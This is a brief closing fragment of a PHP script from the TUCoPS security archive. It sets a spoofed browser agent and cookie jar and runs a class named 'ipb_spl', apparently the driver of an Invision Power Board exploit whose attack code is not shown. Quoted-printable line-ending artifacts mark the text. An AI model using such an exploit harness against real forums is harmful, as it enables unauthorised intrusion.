$web->cookiejar(1);=0D
$web->agent('Mozilla Firefox');=0D
=0D
$ipb = new ipb_spl;=0D
$ipb->web =& $web;=0D
$ipb->main();=0D
=0D
?>

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH